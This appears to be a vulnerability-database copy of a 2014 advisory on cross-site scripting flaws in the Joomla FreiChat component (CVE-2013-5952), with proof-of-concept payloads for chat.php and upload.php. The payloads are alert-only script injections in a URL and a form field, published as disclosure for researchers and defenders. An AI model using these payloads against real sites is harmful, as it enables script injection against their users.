Lucene search
K

Joomla Freichat Cross Site Scripting

🗓️ 15 Mar 2014 00:00:00Reported by Mahmoud GhorbanzadehType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 41 Views

Multiple cross-site scripting (XSS) vulnerabilities in Joomla Freichat component allows remote code injection via specific parameters in chat.php and upload.ph

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2013-5952
19 Mar 201414:00
cve
Cvelist
CVE-2013-5952
19 Mar 201414:00
cvelist
EUVD
EUVD-2013-5784
7 Oct 202500:30
euvd
NVD
CVE-2013-5952
19 Mar 201414:17
nvd
OpenVAS
Joomla Component FrieChat Multiple XSS Vulnerabilities
17 Mar 201400:00
openvas
Prion
Cross site scripting
19 Mar 201414:17
prion
seebug.org
Joomla! FreiChat组件"id"跨站脚本漏洞
19 Mar 201400:00
seebug
`Hello,  
  
Multiple cross-site scripting (XSS) vulnerabilities in Freichat  
component for Joomla! allow remote attackers to inject  
arbitrary web script or HTML code via (1) the id or xhash parameters to  
/client/chat.php or (2) the toname parameter to /client/plugins/upload/upload.php.  
  
  
File: /client/chat.php  
Line: 53  
POC:  
http://site/client/chat.php?id=1"  
></script><script>alert('XSS  
1')</script>&xhash=1" <script>alert('XSS  
2')</script>  
  
  
File: /client/plugins/upload/upload.php  
Line: 91  
POC:  
</style>  
<body>  
<div  
class="frei_upload_border">  
<form name="upload"  
action="http://site/client/plugins/upload/upload.php"  
method="post" enctype="multipart/form-data">  
<label  
for="file">choose file to send</label><br/><br/>  
<input id ="fromid"  
type="hidden" name="fromid"/>  
<input id="fromname"  
type="hidden" name="fromname"/>  
<input id="toid"  
type="hidden" name="toid"/>  
<!--  
<input id="toname" type="hidden"  
name="toname"/> -->  
<input id="toname"  
type="hidden" name="toname"  
value="<script>alert('XSS')</script>"/>  
<input type="file"  
name="file" id="file" value="a.jpeg" />  
<br /><br/>  
<input class ="frei_upload_button"  
type="submit" name="submit" value="Send" />  
</form>  
</div>  
</body></html>  
  
Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of  
Technology's Scientific Excellence and Research Centers.  
  
Best Regards.  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation